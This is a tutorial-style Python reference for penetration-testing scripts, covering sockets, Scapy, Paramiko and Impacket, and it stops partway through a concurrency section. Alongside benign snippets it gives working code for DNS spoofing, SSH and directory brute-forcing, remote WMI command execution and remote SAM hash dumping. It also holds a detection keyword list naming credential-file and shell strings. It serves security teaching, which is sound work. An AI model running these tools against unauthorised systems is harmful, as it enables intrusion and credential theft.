Python Reference for Security Scripts

A practical reference for writing security tools and automation scripts in Python. Each section covers a key library or technique with annotated code snippets ready for adaptation.


Table of Contents

  1. Environment Setup
  2. Socket Programming
  3. HTTP Requests (requests / urllib)
  4. Scapy — Packet Crafting and Sniffing
  5. Subprocess — Running System Commands
  6. Argparse — CLI Argument Parsing
  7. File I/O for Security Scripts
  8. Regular Expressions (re)
  9. JSON and XML Parsing
  10. Cryptography Library
  11. Paramiko — SSH Automation
  12. Impacket Basics
  13. Multithreading and Concurrency
  14. Error Handling Patterns
  15. Output Formatting and Logging
  16. Common Security Script Patterns

1. Environment Setup

Virtual Environment

Always use virtual environments to isolate dependencies:

# Create and activate a virtual environment
python3 -m venv pentest-env
source pentest-env/bin/activate   # Linux/macOS
pentest-env\Scripts\activate      # Windows

# Install common security libraries
pip install requests scapy paramiko impacket pycryptodome python-nmap
pip install beautifulsoup4 lxml colorama tabulate

Shebang and Encoding

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Script description and usage information.
Author: Your Name
Date: 2025-01-01
"""

Import Organization

# Standard library
import os
import sys
import socket
import struct
import time
import json
import re
import argparse
import logging
import threading
from datetime import datetime

# Third-party
import requests
from scapy.all import *
import paramiko

# Local modules
from utils import format_output

2. Socket Programming

TCP Client

import socket

def tcp_client(target_host, target_port, message=""):
    """Simple TCP client for banner grabbing or sending data."""
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    client.settimeout(5)

    try:
        client.connect((target_host, target_port))

        if message:
            client.send(message.encode())

        response = client.recv(4096)
        return response.decode(errors="replace")

    except socket.timeout:
        return "[*] Connection timed out"
    except ConnectionRefusedError:
        return "[*] Connection refused"
    finally:
        client.close()

# Usage: banner grab
banner = tcp_client("192.168.1.10", 22)
print(f"Banner: {banner}")

TCP Server (Listener)

import socket
import threading

def handle_client(client_socket, addr):
    """Handle a single client connection."""
    print(f"[*] Connection from {addr[0]}:{addr[1]}")
    try:
        data = client_socket.recv(4096)
        print(f"[*] Received: {data.decode(errors='replace')}")
        client_socket.send(b"ACK\n")
    finally:
        client_socket.close()

def tcp_server(bind_ip="0.0.0.0", bind_port=9999):
    """Simple TCP server / listener."""
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server.bind((bind_ip, bind_port))
    server.listen(5)
    print(f"[*] Listening on {bind_ip}:{bind_port}")

    while True:
        client, addr = server.accept()
        handler = threading.Thread(target=handle_client, args=(client, addr))
        handler.start()

UDP Client

import socket

def udp_client(target_host, target_port, message):
    """Send a UDP datagram and receive response."""
    client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    client.settimeout(3)

    try:
        client.sendto(message.encode(), (target_host, target_port))
        data, addr = client.recvfrom(4096)
        return data.decode(errors="replace")
    except socket.timeout:
        return "[*] No response (UDP)"
    finally:
        client.close()

Port Scanner

import socket
import threading
from queue import Queue

def port_scan(target, port):
    """Scan a single port on the target."""
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(1)
        result = sock.connect_ex((target, port))
        if result == 0:
            try:
                banner = sock.recv(1024).decode(errors="replace").strip()
            except socket.timeout:
                banner = ""
            return (port, True, banner)
        return (port, False, "")
    except Exception:
        return (port, False, "")
    finally:
        sock.close()

def threaded_scan(target, ports, max_threads=100):
    """Scan multiple ports using threads."""
    results = []
    lock = threading.Lock()
    queue = Queue()

    for port in ports:
        queue.put(port)

    def worker():
        while not queue.empty():
            port = queue.get()
            result = port_scan(target, port)
            if result[1]:  # port is open
                with lock:
                    results.append(result)
            queue.task_done()

    threads = []
    for _ in range(min(max_threads, len(ports))):
        t = threading.Thread(target=worker)
        t.daemon = True
        t.start()
        threads.append(t)

    queue.join()
    return sorted(results, key=lambda x: x[0])

# Usage
open_ports = threaded_scan("192.168.1.10", range(1, 1025))
for port, is_open, banner in open_ports:
    print(f"  Port {port:>5}/tcp  OPEN  {banner}")

Raw Sockets (Linux only)

import socket
import struct

def raw_sniffer(interface="eth0", count=10):
    """Capture raw packets (requires root on Linux)."""
    # Create raw socket
    raw_sock = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.ntohs(3))

    for i in range(count):
        raw_data, addr = raw_sock.recvfrom(65535)

        # Parse Ethernet header (14 bytes)
        eth_header = struct.unpack("!6s6sH", raw_data[:14])
        dst_mac = ":".join(f"{b:02x}" for b in eth_header[0])
        src_mac = ":".join(f"{b:02x}" for b in eth_header[1])
        eth_type = eth_header[2]

        print(f"[{i+1}] {src_mac} -> {dst_mac} (Type: 0x{eth_type:04x})")

        # If IPv4 (0x0800)
        if eth_type == 0x0800:
            ip_header = struct.unpack("!BBHHHBBH4s4s", raw_data[14:34])
            src_ip = socket.inet_ntoa(ip_header[8])
            dst_ip = socket.inet_ntoa(ip_header[9])
            protocol = ip_header[6]
            print(f"     IP: {src_ip} -> {dst_ip} (Proto: {protocol})")

3. HTTP Requests

Basic GET/POST with requests

import requests
from requests.exceptions import RequestException

def web_request(url, method="GET", data=None, headers=None,
                cookies=None, proxy=None, verify=True, timeout=10):
    """Flexible HTTP request wrapper."""
    proxies = {"http": proxy, "https": proxy} if proxy else None
    default_headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) "
                      "AppleWebKit/537.36 (KHTML, like Gecko) "
                      "Chrome/120.0.0.0 Safari/537.36"
    }
    if headers:
        default_headers.update(headers)

    try:
        if method.upper() == "GET":
            resp = requests.get(url, headers=default_headers, cookies=cookies,
                              proxies=proxies, verify=verify, timeout=timeout)
        elif method.upper() == "POST":
            resp = requests.post(url, data=data, headers=default_headers,
                               cookies=cookies, proxies=proxies,
                               verify=verify, timeout=timeout)
        return resp
    except RequestException as e:
        print(f"[!] Request failed: {e}")
        return None

# Usage
resp = web_request("https://example.com")
print(f"Status: {resp.status_code}")
print(f"Headers: {dict(resp.headers)}")
print(f"Body length: {len(resp.text)}")

Session Handling

import requests

def authenticated_session(login_url, username, password):
    """Create and return an authenticated session."""
    session = requests.Session()

    # Authenticate
    login_data = {"username": username, "password": password}
    resp = session.post(login_url, data=login_data)

    if resp.status_code == 200 and "logout" in resp.text.lower():
        print("[+] Authentication successful")
        return session
    else:
        print("[-] Authentication failed")
        return None

# Usage
session = authenticated_session(
    "http://target.com/login",
    "admin",
    "password123"
)
if session:
    # Authenticated requests
    dashboard = session.get("http://target.com/dashboard")

Directory Brute Forcer

import requests
from concurrent.futures import ThreadPoolExecutor

def dir_brute(target_url, wordlist_path, extensions=None, threads=20):
    """Brute-force directories and files on a web server."""
    extensions = extensions or [""]
    found = []

    with open(wordlist_path, "r") as f:
        words = [line.strip() for line in f if line.strip()]

    def check_path(word):
        for ext in extensions:
            path = f"{word}{ext}" if ext else word
            url = f"{target_url.rstrip('/')}/{path}"
            try:
                resp = requests.get(url, timeout=5, allow_redirects=False)
                if resp.status_code not in [404, 403]:
                    result = f"[{resp.status_code}] {url} (Size: {len(resp.content)})"
                    print(result)
                    found.append((resp.status_code, url, len(resp.content)))
            except requests.RequestException:
                pass

    with ThreadPoolExecutor(max_workers=threads) as executor:
        executor.map(check_path, words)

    return found

Handling Proxies (Burp Suite Integration)

import requests
import urllib3

# Suppress InsecureRequestWarning when using Burp
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

BURP_PROXY = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}

# All traffic routes through Burp Suite
resp = requests.get(
    "https://target.com/api/users",
    proxies=BURP_PROXY,
    verify=False  # Required for Burp's self-signed cert
)

4. Scapy — Packet Crafting and Sniffing

Basic Packet Construction

from scapy.all import *

# Build an ICMP echo request (ping)
packet = IP(dst="192.168.1.1") / ICMP()
response = sr1(packet, timeout=2, verbose=0)
if response:
    print(f"[+] {response.src} is alive (TTL: {response.ttl})")

# Build a TCP SYN packet
syn_packet = IP(dst="192.168.1.10") / TCP(dport=80, flags="S")
response = sr1(syn_packet, timeout=2, verbose=0)
if response and response.haslayer(TCP):
    if response[TCP].flags == 0x12:  # SYN-ACK
        print("[+] Port 80 is OPEN")
    elif response[TCP].flags == 0x14:  # RST-ACK
        print("[-] Port 80 is CLOSED")

SYN Scanner

from scapy.all import *

def syn_scan(target, ports):
    """Perform a SYN scan using Scapy (requires root)."""
    open_ports = []

    for port in ports:
        pkt = IP(dst=target) / TCP(dport=port, flags="S")
        resp = sr1(pkt, timeout=1, verbose=0)

        if resp is not None and resp.haslayer(TCP):
            if resp[TCP].flags == 0x12:  # SYN-ACK
                open_ports.append(port)
                # Send RST to close (be polite)
                rst = IP(dst=target) / TCP(dport=port, flags="R")
                send(rst, verbose=0)

    return open_ports

# Usage
results = syn_scan("192.168.1.10", [21, 22, 80, 443, 445, 3389])
print(f"Open ports: {results}")

ARP Scanner (Network Discovery)

from scapy.all import *

def arp_scan(network):
    """Discover live hosts on a network using ARP."""
    arp_request = ARP(pdst=network)
    broadcast = Ether(dst="ff:ff:ff:ff:ff:ff")
    packet = broadcast / arp_request

    answered, _ = srp(packet, timeout=2, verbose=0)

    hosts = []
    for sent, received in answered:
        hosts.append({
            "ip": received.psrc,
            "mac": received.hwsrc
        })

    return hosts

# Usage
hosts = arp_scan("192.168.1.0/24")
for host in hosts:
    print(f"  {host['ip']:>15}  {host['mac']}")

Packet Sniffer

from scapy.all import *
from datetime import datetime

def packet_callback(packet):
    """Process each captured packet."""
    timestamp = datetime.now().strftime("%H:%M:%S")

    if packet.haslayer(TCP):
        src = f"{packet[IP].src}:{packet[TCP].sport}"
        dst = f"{packet[IP].dst}:{packet[TCP].dport}"
        flags = packet[TCP].flags
        print(f"[{timestamp}] TCP {src} -> {dst} [{flags}]")

        # Check for HTTP data
        if packet.haslayer(Raw):
            payload = packet[Raw].load.decode(errors="replace")
            if "HTTP" in payload or "GET" in payload or "POST" in payload:
                print(f"           HTTP: {payload[:100]}")

    elif packet.haslayer(UDP):
        src = f"{packet[IP].src}:{packet[UDP].sport}"
        dst = f"{packet[IP].dst}:{packet[UDP].dport}"
        print(f"[{timestamp}] UDP {src} -> {dst}")

# Usage: sniff HTTP traffic
sniff(filter="tcp port 80", prn=packet_callback, count=50)

DNS Spoofing Example

from scapy.all import *

def dns_spoof(packet):
    """Respond to DNS queries with a spoofed IP."""
    if packet.haslayer(DNSQR):
        queried_domain = packet[DNSQR].qname.decode()
        spoofed_ip = "192.168.1.100"  # Attacker's IP

        spoofed_pkt = (
            IP(dst=packet[IP].src, src=packet[IP].dst) /
            UDP(dport=packet[UDP].sport, sport=53) /
            DNS(
                id=packet[DNS].id,
                qr=1, aa=1, qd=packet[DNS].qd,
                an=DNSRR(rrname=queried_domain, ttl=300, rdata=spoofed_ip)
            )
        )
        send(spoofed_pkt, verbose=0)
        print(f"[*] Spoofed {queried_domain} -> {spoofed_ip}")

# Usage (requires ARP spoofing or network position)
sniff(filter="udp port 53", prn=dns_spoof)

5. Subprocess — Running System Commands

Safe Command Execution

import subprocess
import shlex

def run_command(command, timeout=30):
    """Execute a system command and return output."""
    try:
        # Use shlex.split for safe argument parsing
        args = shlex.split(command)
        result = subprocess.run(
            args,
            capture_output=True,
            text=True,
            timeout=timeout
        )
        return {
            "stdout": result.stdout,
            "stderr": result.stderr,
            "returncode": result.returncode
        }
    except subprocess.TimeoutExpired:
        return {"stdout": "", "stderr": "Command timed out", "returncode": -1}
    except FileNotFoundError:
        return {"stdout": "", "stderr": "Command not found", "returncode": -1}

# Usage
result = run_command("nmap -sV -p 80,443 192.168.1.10")
print(result["stdout"])

Running Nmap from Python

import subprocess
import xml.etree.ElementTree as ET

def nmap_scan(target, arguments="-sV -sC"):
    """Run Nmap and parse XML output."""
    cmd = f"nmap {arguments} -oX - {target}"
    result = subprocess.run(
        shlex.split(cmd),
        capture_output=True, text=True, timeout=300
    )

    if result.returncode != 0:
        print(f"[!] Nmap error: {result.stderr}")
        return None

    # Parse XML output
    root = ET.fromstring(result.stdout)
    hosts = []

    for host in root.findall("host"):
        addr = host.find("address").get("addr")
        ports = []
        for port in host.findall(".//port"):
            port_info = {
                "port": port.get("portid"),
                "protocol": port.get("protocol"),
                "state": port.find("state").get("state"),
                "service": port.find("service").get("name", "unknown"),
                "version": port.find("service").get("product", "")
            }
            ports.append(port_info)
        hosts.append({"ip": addr, "ports": ports})

    return hosts

Piping Between Commands

import subprocess

def pipe_commands(cmd1, cmd2):
    """Pipe output of cmd1 into cmd2."""
    p1 = subprocess.Popen(
        shlex.split(cmd1),
        stdout=subprocess.PIPE
    )
    p2 = subprocess.Popen(
        shlex.split(cmd2),
        stdin=p1.stdout,
        stdout=subprocess.PIPE,
        text=True
    )
    p1.stdout.close()
    output, _ = p2.communicate()
    return output

# Example: grep specific lines from nmap output
result = pipe_commands(
    "nmap -sV 192.168.1.0/24",
    "grep 'open'"
)

6. Argparse — CLI Argument Parsing

Professional CLI Tool Template

#!/usr/bin/env python3
"""
Security Tool Template
Usage: python3 tool.py -t TARGET -p PORTS [options]
"""
import argparse
import sys

def parse_args():
    parser = argparse.ArgumentParser(
        description="Network Security Scanner",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  %(prog)s -t 192.168.1.10 -p 1-1024
  %(prog)s -t 10.0.0.0/24 -p 80,443,8080 --threads 50
  %(prog)s -t targets.txt -p top100 -o results.json
        """
    )

    # Required arguments
    parser.add_argument("-t", "--target", required=True,
                       help="Target IP, range, CIDR, or file")
    parser.add_argument("-p", "--ports", required=True,
                       help="Port(s): single, range (1-1024), "
                            "comma-separated, or 'top100'")

    # Optional arguments
    parser.add_argument("-o", "--output", help="Output file path")
    parser.add_argument("-f", "--format",
                       choices=["text", "json", "csv"],
                       default="text", help="Output format (default: text)")
    parser.add_argument("--threads", type=int, default=10,
                       help="Number of threads (default: 10)")
    parser.add_argument("--timeout", type=float, default=2.0,
                       help="Connection timeout in seconds (default: 2.0)")
    parser.add_argument("-v", "--verbose", action="count", default=0,
                       help="Increase verbosity (-v, -vv, -vvv)")
    parser.add_argument("-q", "--quiet", action="store_true",
                       help="Suppress banner and status messages")

    return parser.parse_args()

def parse_ports(port_string):
    """Parse port specification into a list of integers."""
    ports = set()
    for part in port_string.split(","):
        if "-" in part:
            start, end = part.split("-", 1)
            ports.update(range(int(start), int(end) + 1))
        elif part.lower() == "top100":
            ports.update([21,22,23,25,53,80,110,111,135,139,143,443,
                         445,993,995,1723,3306,3389,5900,8080])
        else:
            ports.add(int(part))
    return sorted(ports)

if __name__ == "__main__":
    args = parse_args()
    ports = parse_ports(args.ports)
    # ... rest of the tool logic

7. File I/O for Security Scripts

Reading Wordlists and Target Files

def load_wordlist(filepath):
    """Load a wordlist, stripping comments and blank lines."""
    words = []
    with open(filepath, "r", encoding="utf-8", errors="replace") as f:
        for line in f:
            line = line.strip()
            if line and not line.startswith("#"):
                words.append(line)
    return words

def load_targets(filepath):
    """Load targets from a file (one per line, supports CIDR)."""
    import ipaddress
    targets = []
    with open(filepath, "r") as f:
        for line in f:
            line = line.strip()
            if not line or line.startswith("#"):
                continue
            try:
                # Try as network (CIDR)
                network = ipaddress.ip_network(line, strict=False)
                targets.extend(str(ip) for ip in network.hosts())
            except ValueError:
                # Treat as hostname
                targets.append(line)
    return targets

Writing Structured Output

import json
import csv
from datetime import datetime

def write_results(results, output_path, fmt="json"):
    """Write scan results to file in specified format."""

    if fmt == "json":
        with open(output_path, "w") as f:
            json.dump({
                "scan_date": datetime.now().isoformat(),
                "results": results
            }, f, indent=2)

    elif fmt == "csv":
        if not results:
            return
        with open(output_path, "w", newline="") as f:
            writer = csv.DictWriter(f, fieldnames=results[0].keys())
            writer.writeheader()
            writer.writerows(results)

    elif fmt == "text":
        with open(output_path, "w") as f:
            for r in results:
                f.write(f"{r}\n")

    print(f"[+] Results written to {output_path}")

Binary File Handling

def read_binary_file(filepath):
    """Read a binary file and return bytes."""
    with open(filepath, "rb") as f:
        return f.read()

def hexdump(data, length=16):
    """Display binary data as a hex dump."""
    result = []
    for i in range(0, len(data), length):
        chunk = data[i:i+length]
        hex_str = " ".join(f"{b:02x}" for b in chunk)
        ascii_str = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        result.append(f"{i:08x}  {hex_str:<{length*3}}  |{ascii_str}|")
    return "\n".join(result)

# Usage
data = read_binary_file("/path/to/binary")
print(hexdump(data[:256]))

8. Regular Expressions (re)

Common Security Patterns

import re

# IP Address extraction
IP_PATTERN = re.compile(
    r'\b(?:(?:25[0-5]|2[0-4]\d|[01]?\d\d?)\.){3}'
    r'(?:25[0-5]|2[0-4]\d|[01]?\d\d?)\b'
)

# Email extraction
EMAIL_PATTERN = re.compile(
    r'[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}'
)

# URL extraction
URL_PATTERN = re.compile(
    r'https?://[^\s<>"\']+|www\.[^\s<>"\']+'
)

# Hash detection
MD5_PATTERN = re.compile(r'\b[a-fA-F0-9]{32}\b')
SHA1_PATTERN = re.compile(r'\b[a-fA-F0-9]{40}\b')
SHA256_PATTERN = re.compile(r'\b[a-fA-F0-9]{64}\b')

# Password pattern in source code
PASSWORD_PATTERNS = re.compile(
    r'(?:password|passwd|pwd|secret|api_key|apikey|token|auth)'
    r'\s*[=:]\s*["\']([^"\']+)["\']',
    re.IGNORECASE
)

# Credit card patterns
CC_PATTERN = re.compile(
    r'\b(?:\d[ -]*?){13,16}\b'
)

# Base64-encoded strings
BASE64_PATTERN = re.compile(
    r'[A-Za-z0-9+/]{20,}={0,2}'
)

def extract_all(text):
    """Extract all interesting artifacts from text."""
    return {
        "ips": IP_PATTERN.findall(text),
        "emails": EMAIL_PATTERN.findall(text),
        "urls": URL_PATTERN.findall(text),
        "md5_hashes": MD5_PATTERN.findall(text),
        "sha1_hashes": SHA1_PATTERN.findall(text),
        "sha256_hashes": SHA256_PATTERN.findall(text),
        "passwords": PASSWORD_PATTERNS.findall(text),
        "base64_strings": BASE64_PATTERN.findall(text),
    }

# Usage
with open("logfile.txt") as f:
    artifacts = extract_all(f.read())
    for category, items in artifacts.items():
        if items:
            print(f"\n{category}: {len(items)} found")
            for item in items[:5]:
                print(f"  {item}")

Log File Parsing

import re
from collections import Counter

# Apache access log pattern
APACHE_LOG = re.compile(
    r'(?P<ip>\S+) \S+ \S+ '
    r'\[(?P[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d+) (?P<size>\S+)'
)

def parse_access_log(filepath):
    """Parse Apache/Nginx access log and find suspicious activity."""
    ip_counter = Counter()
    failed_logins = []
    suspicious_paths = []

    suspicious_keywords = [
        "union", "select", "../../", "etc/passwd",
        "<script", "cmd.exe", "eval(", "system("
    ]

    with open(filepath) as f:
        for line in f:
            match = APACHE_LOG.match(line)
            if not match:
                continue

            ip = match.group("ip")
            path = match.group("path")
            status = match.group("status")

            ip_counter[ip] += 1

            # Check for SQL injection / traversal attempts
            path_lower = path.lower()
            for keyword in suspicious_keywords:
                if keyword in path_lower:
                    suspicious_paths.append((ip, path, status))
                    break

            # Check for authentication failures
            if status in ["401", "403"] and "login" in path_lower:
                failed_logins.append((ip, path))

    return {
        "top_ips": ip_counter.most_common(20),
        "suspicious_requests": suspicious_paths,
        "failed_logins": failed_logins
    }

9. JSON and XML Parsing

JSON (API Responses)

import json

# Parse API response
def parse_api_response(response_text):
    """Parse and extract data from JSON API response."""
    try:
        data = json.loads(response_text)
    except json.JSONDecodeError as e:
        print(f"[!] Invalid JSON: {e}")
        return None

    # Navigate nested structures safely
    def safe_get(d, *keys, default=None):
        for key in keys:
            if isinstance(d, dict):
                d = d.get(key, default)
            elif isinstance(d, list) and isinstance(key, int):
                d = d[key] if key < len(d) else default
            else:
                return default
        return d

    # Example: extract user data
    users = safe_get(data, "results", default=[])
    return users

# Pretty-print JSON for analysis
def print_json(data):
    print(json.dumps(data, indent=2, default=str))

XML (Nmap Output, SAML, SOAP)

import xml.etree.ElementTree as ET

def parse_nmap_xml(xml_file):
    """Parse Nmap XML output file."""
    tree = ET.parse(xml_file)
    root = tree.getroot()

    results = []
    for host in root.findall("host"):
        host_info = {
            "ip": host.find("address").get("addr"),
            "state": host.find("status").get("state"),
            "ports": []
        }

        for port in host.findall(".//port"):
            service = port.find("service")
            port_info = {
                "port": int(port.get("portid")),
                "protocol": port.get("protocol"),
                "state": port.find("state").get("state"),
                "service": service.get("name", "") if service is not None else "",
                "product": service.get("product", "") if service is not None else "",
                "version": service.get("version", "") if service is not None else "",
            }

            # Extract script output
            scripts = {}
            for script in port.findall("script"):
                scripts[script.get("id")] = script.get("output")
            if scripts:
                port_info["scripts"] = scripts

            host_info["ports"].append(port_info)

        results.append(host_info)

    return results

# Parse SAML assertions (for security testing)
def extract_saml_attributes(saml_response_xml):
    """Extract attributes from a SAML Response."""
    ns = {
        "saml": "urn:oasis:names:tc:SAML:2.0:assertion",
        "samlp": "urn:oasis:names:tc:SAML:2.0:protocol"
    }
    root = ET.fromstring(saml_response_xml)
    attributes = {}
    for attr in root.findall(".//saml:Attribute", ns):
        name = attr.get("Name")
        values = [v.text for v in attr.findall("saml:AttributeValue", ns)]
        attributes[name] = values
    return attributes

10. Cryptography Library

Hashing

import hashlib

def hash_string(text, algorithm="sha256"):
    """Hash a string with the specified algorithm."""
    h = hashlib.new(algorithm)
    h.update(text.encode())
    return h.hexdigest()

def hash_file(filepath, algorithm="sha256"):
    """Calculate file hash."""
    h = hashlib.new(algorithm)
    with open(filepath, "rb") as f:
        while chunk := f.read(8192):
            h.update(chunk)
    return h.hexdigest()

# Common hash types
text = "password123"
print(f"MD5:    {hash_string(text, 'md5')}")
print(f"SHA1:   {hash_string(text, 'sha1')}")
print(f"SHA256: {hash_string(text, 'sha256')}")
print(f"SHA512: {hash_string(text, 'sha512')}")

AES Encryption/Decryption

from Crypto.Cipher import AES
from Crypto.Random import get_random_bytes
from Crypto.Util.Padding import pad, unpad
import base64

def aes_encrypt(plaintext, key):
    """Encrypt using AES-256-CBC."""
    iv = get_random_bytes(16)
    cipher = AES.new(key, AES.MODE_CBC, iv)
    ciphertext = cipher.encrypt(pad(plaintext.encode(), AES.block_size))
    return base64.b64encode(iv + ciphertext).decode()

def aes_decrypt(encrypted_b64, key):
    """Decrypt AES-256-CBC."""
    raw = base64.b64decode(encrypted_b64)
    iv = raw[:16]
    ciphertext = raw[16:]
    cipher = AES.new(key, AES.MODE_CBC, iv)
    plaintext = unpad(cipher.decrypt(ciphertext), AES.block_size)
    return plaintext.decode()

# Usage
key = get_random_bytes(32)  # 256-bit key
encrypted = aes_encrypt("Sensitive data here", key)
decrypted = aes_decrypt(encrypted, key)
print(f"Encrypted: {encrypted}")
print(f"Decrypted: {decrypted}")

RSA Key Generation and Usage

from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP
from Crypto.Signature import pkcs1_15
from Crypto.Hash import SHA256

# Generate RSA key pair
key = RSA.generate(2048)
private_key = key.export_key()
public_key = key.publickey().export_key()

# Encrypt with public key
def rsa_encrypt(plaintext, pub_key_pem):
    pub_key = RSA.import_key(pub_key_pem)
    cipher = PKCS1_OAEP.new(pub_key)
    return cipher.encrypt(plaintext.encode())

# Decrypt with private key
def rsa_decrypt(ciphertext, priv_key_pem):
    priv_key = RSA.import_key(priv_key_pem)
    cipher = PKCS1_OAEP.new(priv_key)
    return cipher.decrypt(ciphertext).decode()

# Sign and verify
def sign_data(data, priv_key_pem):
    priv_key = RSA.import_key(priv_key_pem)
    h = SHA256.new(data.encode())
    signature = pkcs1_15.new(priv_key).sign(h)
    return signature

def verify_signature(data, signature, pub_key_pem):
    pub_key = RSA.import_key(pub_key_pem)
    h = SHA256.new(data.encode())
    try:
        pkcs1_15.new(pub_key).verify(h, signature)
        return True
    except (ValueError, TypeError):
        return False

Password Hashing (bcrypt)

import bcrypt

def hash_password(password):
    """Hash a password with bcrypt."""
    salt = bcrypt.gensalt(rounds=12)
    return bcrypt.hashpw(password.encode(), salt)

def verify_password(password, hashed):
    """Verify a password against a bcrypt hash."""
    return bcrypt.checkpw(password.encode(), hashed)

# Usage
hashed = hash_password("my_secure_password")
print(f"Hash: {hashed.decode()}")
print(f"Valid: {verify_password('my_secure_password', hashed)}")
print(f"Invalid: {verify_password('wrong_password', hashed)}")

11. Paramiko — SSH Automation

SSH Command Execution

import paramiko

def ssh_execute(hostname, username, password=None, key_file=None,
                command="id", port=22):
    """Execute a command over SSH."""
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())

    try:
        connect_kwargs = {
            "hostname": hostname,
            "port": port,
            "username": username,
            "timeout": 10,
        }
        if key_file:
            connect_kwargs["key_filename"] = key_file
        else:
            connect_kwargs["password"] = password

        client.connect(**connect_kwargs)
        stdin, stdout, stderr = client.exec_command(command)

        return {
            "stdout": stdout.read().decode(),
            "stderr": stderr.read().decode(),
            "exit_code": stdout.channel.recv_exit_status()
        }
    except paramiko.AuthenticationException:
        return {"error": "Authentication failed"}
    except paramiko.SSHException as e:
        return {"error": f"SSH error: {e}"}
    except Exception as e:
        return {"error": f"Connection error: {e}"}
    finally:
        client.close()

# Usage
result = ssh_execute("192.168.1.10", "admin", password="admin123",
                     command="uname -a")
print(result["stdout"])

SSH Brute Forcer

import paramiko
import threading
from queue import Queue

def ssh_brute(hostname, username, wordlist_path, port=22, threads=5):
    """Attempt SSH login with passwords from wordlist."""
    found = threading.Event()
    password_queue = Queue()

    with open(wordlist_path) as f:
        for line in f:
            password_queue.put(line.strip())

    def try_login():
        while not password_queue.empty() and not found.is_set():
            password = password_queue.get()
            client = paramiko.SSHClient()
            client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
            try:
                client.connect(hostname, port=port, username=username,
                             password=password, timeout=3,
                             banner_timeout=3, auth_timeout=3)
                found.set()
                print(f"[+] FOUND: {username}:{password}")
                client.close()
                return password
            except paramiko.AuthenticationException:
                pass  # Wrong password
            except Exception:
                pass  # Connection error
            finally:
                password_queue.task_done()

    workers = []
    for _ in range(threads):
        t = threading.Thread(target=try_login)
        t.daemon = True
        t.start()
        workers.append(t)

    password_queue.join()
    return None

SFTP File Operations

import paramiko

def sftp_operations(hostname, username, password, port=22):
    """Demonstrate SFTP file operations."""
    transport = paramiko.Transport((hostname, port))
    transport.connect(username=username, password=password)
    sftp = paramiko.SFTPClient.from_transport(transport)

    try:
        # List directory
        files = sftp.listdir("/tmp")
        print(f"Files in /tmp: {files[:10]}")

        # Download file
        sftp.get("/etc/passwd", "downloaded_passwd.txt")

        # Upload file
        sftp.put("local_script.sh", "/tmp/uploaded_script.sh")

        # Read file content
        with sftp.open("/etc/hostname", "r") as f:
            hostname_content = f.read().decode()
            print(f"Hostname: {hostname_content.strip()}")

    finally:
        sftp.close()
        transport.close()

12. Impacket Basics

SMB Enumeration

from impacket.smbconnection import SMBConnection

def smb_enumerate(target, username="", password="", domain=""):
    """Enumerate SMB shares and basic info."""
    try:
        conn = SMBConnection(target, target, sess_port=445)

        if username:
            conn.login(username, password, domain)
        else:
            conn.login("", "")  # Null session

        print(f"[*] OS: {conn.getServerOS()}")
        print(f"[*] Domain: {conn.getServerDomain()}")
        print(f"[*] Hostname: {conn.getServerName()}")

        # List shares
        shares = conn.listShares()
        print(f"\n[*] Shares:")
        for share in shares:
            name = share["shi1_netname"][:-1]  # Remove null byte
            comment = share["shi1_remark"][:-1]
            print(f"  {name:<20} {comment}")

            # Try to list files in share
            try:
                files = conn.listPath(name, "*")
                for f in files[:5]:
                    print(f"    -> {f.get_longname()}")
            except Exception:
                print(f"    -> [Access Denied]")

        conn.logoff()
    except Exception as e:
        print(f"[!] Error: {e}")

Executing Commands via WMI

from impacket.dcerpc.v5.dcomrt import DCOMConnection
from impacket.dcerpc.v5.dcom.wmi import WBEM_FLAG_FORWARD_ONLY
import impacket.dcerpc.v5.dcom.wmi as wmi

def wmi_exec(target, username, password, domain, command):
    """Execute a command via WMI."""
    try:
        dcom = DCOMConnection(target, username, password, domain)
        iInterface = dcom.CoCreateInstanceEx(
            wmi.CLSID_WbemLevel1Login, wmi.IID_IWbemLevel1Login
        )
        iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface)
        iWbemServices = iWbemLevel1Login.NTLMLogin("//./root/cimv2", None, None)
        iWbemLevel1Login.RemRelease()

        win32_process, _ = iWbemServices.GetObject("Win32_Process")
        win32_process.Create(command, "C:\\", None)

        print(f"[+] Command executed on {target}: {command}")
        dcom.disconnect()
    except Exception as e:
        print(f"[!] WMI exec failed: {e}")

Secretsdump (Hash Extraction)

# Impacket's secretsdump functionality (conceptual usage)
# In practice, use the command-line tool:
#   secretsdump.py domain/user:password@target

from impacket.examples.secretsdump import RemoteOperations, SAMHashes

def dump_sam(target, username, password, domain=""):
    """Dump SAM hashes from a remote Windows host."""
    try:
        from impacket.smbconnection import SMBConnection

        conn = SMBConnection(target, target)
        conn.login(username, password, domain)

        remote_ops = RemoteOperations(conn, False)
        remote_ops.enableRegistry()

        sam_hashes = SAMHashes(
            remote_ops.saveSAM(),
            remote_ops._RemoteOperations__bootKey,
            isRemote=True
        )
        sam_hashes.dump()
        sam_hashes.export("sam_hashes.txt")

        remote_ops.finish()
        conn.logoff()
    except Exception as e:
        print(f"[!] Error: {e}")

13. Multithreading and Concurrency

Thread Pool Pattern

from concurrent.futures import ThreadPoolExecutor, as_completed
import threading

def scan_target(target):
    """Placeholder scan function."""
    # ... scanning logic ...
    return {"target": target, "status": "open"}

def parallel_scan(targets, max_workers=50):
    """Scan multiple targets in parallel."""
    results = []
    lock = threading.Lock()

    with ThreadPoolExecutor(max_workers=max_workers) as executor:
        future_to_target = {
